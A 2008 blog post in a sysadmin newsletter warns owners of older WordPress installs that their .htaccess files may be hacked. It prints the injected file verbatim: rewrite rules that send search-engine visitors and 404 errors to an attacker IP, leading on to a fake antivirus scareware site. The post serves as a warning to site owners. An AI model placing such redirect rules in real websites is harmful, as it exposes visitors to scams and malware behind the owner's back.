 |
 |
 |
|
08.28.08 Beware Of Wordpress .htaccess Hack  By Brian Turner Just quick heads up for anybody who may have any older Wordpress installs running to check their .htaccess file hasn't been hacked. I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere. In short, the original .htaccess file is replaced with one which redirects internal page requests to Russian "check your PC security" site, which may also threaten to install malware. It's a nasty little hack, and this is what I found on mine: RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L] Errordocument 404 http://87.248.180.88/in.html?s=hg_err
The result was to send people to the following link: http://scan.power-antivirus-2009.com/?aff=1050 Ugly, nasty, and very annoying. Go check now if you need to. Comments About the Author: I'm a SEO & business consultant in the UK, specialising in SME's and start-ups. I run Platinax Internet as a free resource for small business trying to get the best out of being online and offer internet management services from my main company, Britecorp. In my spare time I'm an aspiring science fiction and fantasy writer, and currently live with my family in the Highlands of Scotland. Contact Brian |
|
| ||
 |
|
-- SysAdminNews is an iEntry, Inc. publication -- iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509 2008 iEntry, Inc. All Rights Reserved Privacy Policy Legal archives | advertising info | news headlines | free newsletters | comments/feedback | submit article |
